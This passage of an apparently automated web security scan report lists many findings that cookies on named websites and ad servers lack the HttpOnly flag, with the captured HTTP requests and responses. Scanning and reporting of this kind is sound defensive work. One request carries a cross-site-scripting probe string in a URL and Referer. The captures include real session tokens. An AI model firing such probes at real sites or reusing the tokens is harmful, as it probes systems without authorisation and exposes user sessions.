Set-Cookie: WDVID=%7B97000B01%2D7AE0%2D4995%2DBF8B%2D3577DB039EC5%7D; path=/
Set-Cookie: WDUID=%7BE08A6E4D%2D6412%2D46DB%2D8C05%2D6F7AAF226F96%7D; expires=Wed, 02-Feb-2022 05:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDSQQTBQSA=MGIKPLNDFOODMPNILBFIJKHE; path=/
Cache-control: private
Set-Cookie: NSC_WJQ-XXX.VTBJSXBZTDSVJTFT.DPN=ffffffff095b1c1a45525d5f4f58455e445a4a423662;path=/

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/images_unique/blank.gif">here</a>.</body>

13.64. http://www.usavacuum.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.usavacuum.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDSQTABAST=EIKNAPODEOKCGPCPAPANHKHC; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.usavacuum.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:24:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 1643
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQTABAST=EIKNAPODEOKCGPCPAPANHKHC; path=/
Cache-control: private
Vary: Accept-Encoding, User-Agent

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head><title>The page cannot be found</title>
<meta http-equiv="Content-Type" content="text/htm
...[SNIP]...

13.65. http://www.usg.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.usg.com
Path:	/favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=D42C0042CEA4C48D616B559B670BD36B; Path=/
ARPT=YXMMONS64.43.232.171CKMYL; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.usg.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Set-Cookie: ARPT=YXMMONS64.43.232.171CKMYL; path=/
Date: Tue, 03 May 2011 11:43:06 GMT
Set-Cookie: JSESSIONID=D42C0042CEA4C48D616B559B670BD36B; Path=/
Content-Type: text/html;charset=utf-8
Content-Length: 988

<html><head><title>Apache Tomcat/6.0.20 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans
...[SNIP]...

13.66. http://www.vc.edu/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.vc.edu
Path:	/favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CFID=1036549;expires=Thu, 25-Apr-2041 10:37:23 GMT;path=/
CFTOKEN=c9ed98125e6d8b65-165D0D47-D954-B9B6-E7BCBA3CF75B99B5;expires=Thu, 25-Apr-2041 10:37:23 GMT;path=/
JSESSIONID=8430f8d03a4cffc5679c5026747373c65324;path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.vc.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response

13.67. http://www.vermontjoblink.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.vermontjoblink.com
Path:	/favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CFID=4238872;expires=Thu, 25-Apr-2041 10:59:13 GMT;path=/
CFTOKEN=5f318373604b1ab-B58304D2-C94D-8595-1A688EBD59F09FDB;expires=Thu, 25-Apr-2041 10:59:13 GMT;path=/
CFID=4238872;path=/
CFTOKEN=5f318373604b1ab%2DB58304D2%2DC94D%2D8595%2D1A688EBD59F09FDB;path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.vermontjoblink.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2011 10:59:13 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4238872;expires=Thu, 25-Apr-2041 10:59:13 GMT;path=/
Set-Cookie: CFTOKEN=5f318373604b1ab-B58304D2-C94D-8595-1A688EBD59F09FDB;expires=Thu, 25-Apr-2041 10:59:13 GMT;path=/
Set-Cookie: CFID=4238872;path=/
Set-Cookie: CFTOKEN=5f318373604b1ab%2DB58304D2%2DC94D%2D8595%2D1A688EBD59F09FDB;path=/
Content-Type: text/html; charset=UTF-8


               <html lang="en">
               <head>
               <meta http-equiv="refresh" content="0;URL=https://www.vermontjoblink.com/ada/404/404_qry.cfm?404;http://www.vermontjoblink
...[SNIP]...

13.68. http://www.we7.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.we7.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=C2BA226107F551E43203D4D8CD0AD0B3; Domain=.we7.com; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.we7.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

13.69. http://www.womensenews.org/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.womensenews.org
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SESS2be37513653a1338d2829f0b957496d8=8jav9fe3ub7pj9cuf45995gab4; expires=Thu, 26-May-2011 14:05:41 GMT; path=/; domain=www.womensenews.org

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.womensenews.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:32:21 GMT
Server: Apache/2.2.14 (EL)
X-Powered-By: PHP/5.2.14
Set-Cookie: SESS2be37513653a1338d2829f0b957496d8=8jav9fe3ub7pj9cuf45995gab4; expires=Thu, 26-May-2011 14:05:41 GMT; path=/; domain=www.womensenews.org
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 03 May 2011 10:32:21 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16495

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<hea
...[SNIP]...

13.70. http://www.wtma.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.wtma.com
Path:	/favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASPSESSIONIDCCCCBBQC=FFFDPAPDGBDBPFGOJLMGNDFN; path=/
NSC_DjubefmTjuft=ffffffff09021e8945525d5f4f58455e445a4a423660;path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wtma.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:08:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="NON DSP COR OTPa OUR IND OTC"
Content-Length: 66
Content-Type: text/html
Set-Cookie: SiteUserIsBot=0; path=/
Set-Cookie: ASPSESSIONIDCCCCBBQC=FFFDPAPDGBDBPFGOJLMGNDFN; path=/
Cache-control: private
Set-Cookie: NSC_DjubefmTjuft=ffffffff09021e8945525d5f4f58455e445a4a423660;path=/

<br>Error, file not found: 404;http://www.wtma.com:80/favicon.ico

13.71. http://a.collective-media.net/adj/cm.rev_lee/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/cm.rev_lee/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

cli=11fda49064879b2; domain=collective-media.net; path=/; expires=Thu, 02-May-2013 15:43:25 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.72. http://a.tribalfusion.com/displayAd.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/displayAd.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ANON_ID=atnpe3riItw63PTTfU3jPLZdEIybqZdqMJjTN8yHX8uBTIMUx5F3lA; path=/; domain=.tribalfusion.com; expires=Mon, 01-Aug-2011 15:41:22 GMT;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.73. http://a.tribalfusion.com/j.ad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/j.ad

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ANON_ID=apnsmARkP6tPeCno77TbSlMZcFZb2wrWBA9EWE6SSvoPZa09lardrroK4QWZbZbxcvnSVY9HGKZbDsFCRD; path=/; domain=.tribalfusion.com; expires=Mon, 01-Aug-2011 15:41:24 GMT;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.74. http://a.triggit.com/pxcwicm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.triggit.com
Path:	/pxcwicm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

trgu=40981ca3-3c73-4c03-808e-d619dec4af1e; domain=.triggit.com; path=/; expires=Tue, 03-May-2016 00:00:00 GMT;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.75. http://ad.turn.com/server/pixel.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/server/pixel.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

uid=7192737220943691581; Domain=.turn.com; Expires=Sun, 30-Oct-2011 15:41:31 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=7192737220943691581; Domain=.turn.com; Expires=Sun, 30-Oct-2011 15:41:31 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 03 May 2011 15:41:31 GMT
Content-Length: 336

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
src="http://cdn.turn.com/server/ddc.htm?uid=7192737220943691581&rnd=6976564438829907773&fpid=12&nu=y&t
...[SNIP]...

13.76. http://ad.yieldmanager.com/iframe3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/iframe3

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ih="b!!!!$!.`.U!!!!#<y'ux!2$8S!!!!#<y'ui"; path=/; expires=Thu, 02-May-2013 15:41:23 GMT
vuday1=#2_v>Gf(n`!44Nv[k6+*; path=/; expires=Wed, 04-May-2011 00:00:00 GMT
BX=ek8k2sl67ofpa&b=4&s=o9&t=39; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /iframe3?bCIAAN51GAAqmW0AAAAAAD8wHAAAAAAAAgAAAPgAAAAAAP8AAAADC6pSJQAAAAAArFIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAntA8AAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB5AEkioAYJCuvPVQB26IvqjDNR9aQy4Tagx25WAAAAAA==,,http%3A%2F%2Fd3.zedo.com%2Fjsc%2Fd3%2Fff2.html%3Fn%3D933%3Bc%3D56%3Bs%3D1%3Bd%3D15%3Bw%3D1%3Bh%3D1%3Bq%3D1190,Z%3D1x1%26s%3D1603038%26_salt%3D1973615950%26B%3D12%26m%3D2%26u%3Dhttp%253A%252F%252Fd3.zedo.com%252Fjsc%252Fd3%252Fff2.html%253Fn%253D933%253Bc%253D56%253Bs%253D1%253Bd%253D15%253Bw%253D1%253Bh%253D1%253Bq%253D1190%26r%3D0,cb1c926a-759b-11e0-9306-78e7d1f5c98c HTTP/1.1
Host: ad.yieldmanager.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ads.bluelithium.com/st?ad_type=iframe&ad_size=1x1&section=1603038
Cookie: BX=ek8k2sl67ofpa&b=4&s=o9&t=39; ih="b!!!!#!2$8S!!!!#<y'ui"; bh="b!!!!#!#b9/!!!!#<uEax"; uid=uid=3211e7aa-6128-11e0-94a2-78e7d1fa1382&_hmacv=1&_salt=3467543305&_keyid=k1&_hmac=599f824c39dba32448c5de68d287605e48f2b755; vuday1=#2_v>!44Nv.P1y^

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 15:41:23 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
X-RightMedia-Hostname: raptor0001.rm.ac4
Set-Cookie: ih="b!!!!$!.`.U!!!!#<y'ux!2$8S!!!!#<y'ui"; path=/; expires=Thu, 02-May-2013 15:41:23 GMT
Set-Cookie: vuday1=#2_v>Gf(n`!44Nv[k6+*; path=/; expires=Wed, 04-May-2011 00:00:00 GMT
Set-Cookie: BX=ek8k2sl67ofpa&b=4&s=o9&t=39; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Tue, 03 May 2011 15:41:23 GMT
Pragma: no-cache
Content-Length: 350
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(7182634);}
</script><!-- Begin ZEDO
...[SNIP]...

13.77. http://ad.yieldmanager.com/imp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/imp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ih="b!!!!#!2$8S!!!!#<y'uj"; path=/; expires=Thu, 02-May-2013 15:41:09 GMT
vuday1=#2_v>!44Nv.P1y^; path=/; expires=Wed, 04-May-2011 00:00:00 GMT
BX=ek8k2sl67ofpa&b=4&s=o9&t=39; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /imp?Z=300x250&s=748066&r=1&_salt=1834002789&u=http%3A%2F%2Fwww.maysville-online.com%2Ffavicon.ico%3Fbe4e4%2522-alert%281%29-%2522ccebc516c28%3D1 HTTP/1.1
Host: ad.yieldmanager.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/favicon.ico?be4e4%22-alert(1)-%22ccebc516c28=1
Cookie: BX=ek8k2sl67ofpa&b=4&s=o9&t=39; ih="b!!!!#!00I]!!!!#<mCY1"; bh="b!!!!#!#b9/!!!!#<uEax"; uid=uid=3211e7aa-6128-11e0-94a2-78e7d1fa1382&_hmacv=1&_salt=3467543305&_keyid=k1&_hmac=599f824c39dba32448c5de68d287605e48f2b755

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 15:41:09 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
X-RightMedia-Hostname: raptor0002.rm.ac4.yahoo.com
Set-Cookie: ih="b!!!!#!2$8S!!!!#<y'uj"; path=/; expires=Thu, 02-May-2013 15:41:09 GMT
Set-Cookie: vuday1=#2_v>!44Nv.P1y^; path=/; expires=Wed, 04-May-2011 00:00:00 GMT
Set-Cookie: BX=ek8k2sl67ofpa&b=4&s=o9&t=39; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Tue, 03 May 2011 15:41:09 GMT
Pragma: no-cache
Content-Length: 236
Content-Type: application/x-javascript
Age: 0
Proxy-Connection: close

document.write('<iframe src="http://d3.zedo.com/jsc/d3/ff2.html?n=1190;c=1;s=1;d=9;w=300;h=250;$=audiencescience300x250" frameborder=0 marginheight=0 marginwidth=0 scrolling="no" allowTransparency="tr
...[SNIP]...

13.78. http://ads.adbrite.com/adserver/vdi/742697 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.adbrite.com
Path:	/adserver/vdi/742697

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

srh="1%3Aq64FAA%3D%3D"; path=/; domain=.adbrite.com; expires=Wed, 04-May-2011 15:41:37 GMT
rb2=CiMKBjc0MjY5NxjdwenaDCITMzY1ODE5NTk2NjAyOTQxNzk3MBAB; path=/; domain=.adbrite.com; expires=Mon, 01-Aug-2011 15:41:37 GMT
vsd=0@1@4dc02231@cdn.turn.com; path=/; domain=.adbrite.com; expires=Thu, 05-May-2011 15:41:37 GMT
rb=0:742697:20828160:3658195966029417970:0; path=/; domain=.adbrite.com; expires=Mon, 01-Aug-2011 15:41:37 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.79. http://ads.pointroll.com/PortalServe/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.pointroll.com
Path:	/PortalServe/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PRID=C5584CF0-8B69-4387-BD9F-A54A34698515; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
PRbu=EomEA2WJP;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
PRvt=CBJpJEomEA2WJP!FsBAe;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
PRgo=BBBAAuILA;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
PRimp=61A20400-D900-4F62-1309-A490016C0100; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
PRca=|AKRD*2017:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
PRcp=|AKRDAA67:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
PRpl=|FZtP:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
PRcr=|GMHx:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
PRpc=|FZtPGMHx:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.80. http://ads.specificmedia.com/serve/v=5 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.specificmedia.com
Path:	/serve/v=5

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

smu=5013.3585181213909565146; domain=.specificmedia.com; path=/; expires=Wed, 06-Apr-2016 15:42:12 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.81. http://afe.specificclick.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://afe.specificclick.net
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

adp=7hlD^1^1; Domain=.specificclick.net; Expires=Wed, 02-May-2012 15:42:09 GMT; Path=/
ug=8KDk18WjAyI1pC; Domain=.specificclick.net; Expires=Wed, 02-May-2012 15:42:09 GMT; Path=/
smdmp=7hlD:811200901; Domain=.specificclick.net; Expires=Wed, 02-May-2012 15:42:09 GMT; Path=/
adf=7hlD^0^0; Domain=.specificclick.net; Expires=Wed, 02-May-2012 15:42:09 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.82. http://ak1.abmr.net/is/k.collective-media.net previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ak1.abmr.net
Path:	/is/k.collective-media.net

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

01AI=2-2-1C30B961A12E6C3C10F68169419EF9635E43541675D98A03E81DDE0F1293867C-355AA514FC933AD582F163FC183349E64FC79FF5AE90EB662836414D5AD43CB4; expires=Wed, 02-May-2012 15:43:28 GMT; path=/; domain=.abmr.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.83. http://ak1.abmr.net/is/tag.contextweb.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ak1.abmr.net
Path:	/is/tag.contextweb.com

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

01AI=2-2-549E010380BF766569750F59A0B65C26361C220E101E4D3E61AACC2FFB4D695B-09D0C140CBECFEAC70EB1765AEF0C92F4AC8CBEB5F841CEC823E4CC90566AF8A; expires=Wed, 02-May-2012 15:41:25 GMT; path=/; domain=.abmr.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.84. http://ar.voicefive.com/b/wc_beacon.pli previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/b/wc_beacon.pli

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BMX_G=method%2D%3E%2D1%2Cts%2D%3E1304437337%2E002%2Cwait%2D%3E10000%2C; path=/; domain=.voicefive.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.85. http://ar.voicefive.com/bmx3/broker.pli previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ar_p87077372=exp=1&initExp=Tue May 3 15:42:18 2011&recExp=Tue May 3 15:42:18 2011&prad=124094&arc=184537%3F684451&; expires=Mon 01-Aug-2011 15:42:18 GMT; path=/; domain=.voicefive.com;
BMX_G=method->-1,ts->1304437338; path=/; domain=.voicefive.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.86. http://as.casalemedia.com/j previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://as.casalemedia.com
Path:	/j

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CMID=.uYdh63LtckAAAy9QKIAAABX;domain=casalemedia.com;path=/;expires=Wed, 02 May 2012 15:41:57 GMT
CMST=TcAiRU3AIkUB;domain=casalemedia.com;path=/;expires=Wed, 04 May 2011 15:41:57 GMT
CMSC=TcAiRQ**;domain=casalemedia.com;path=/;
CMDD=AAHcNgE*;domain=casalemedia.com;path=/;expires=Wed, 04 May 2011 15:41:57 GMT
CMD4=AAE5fk3AIkUAAdw2AALYXgEBAA**;domain=casalemedia.com;path=/;expires=Thu, 02 Jun 2011 15:41:57 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.87. http://b.scorecardresearch.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UID=7278cea-24.143.206.58-1297260492; expires=Thu, 02-May-2013 15:41:33 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.88. http://b.voicefive.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.voicefive.com
Path:	/b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UID=3e0cd3b-72.246.30.17-1304437355; expires=Thu, 02-May-2013 15:42:35 GMT; path=/; domain=.voicefive.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.89. http://bh.contextweb.com/bh/rtset previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bh.contextweb.com
Path:	/bh/rtset

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

V=RiC6i2pCL3Ub; Domain=.contextweb.com; Expires=Fri, 27-Apr-2012 15:41:31 GMT; Path=/
pb_rtb_ev=1:531292.AA-00000001931708427.0; Domain=.contextweb.com; Expires=Wed, 02-May-2012 15:41:31 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.90. http://cms.quantserve.com/dpixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cms.quantserve.com
Path:	/dpixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

d=ENgBDAHUBoEAlw; expires=Mon, 01-Aug-2011 15:42:40 GMT; path=/; domain=.quantserve.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.91. http://contextweb-match.dotomi.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://contextweb-match.dotomi.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

Apache=173.193.214.243.1304437298819729; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: contextweb-match.dotomi.com
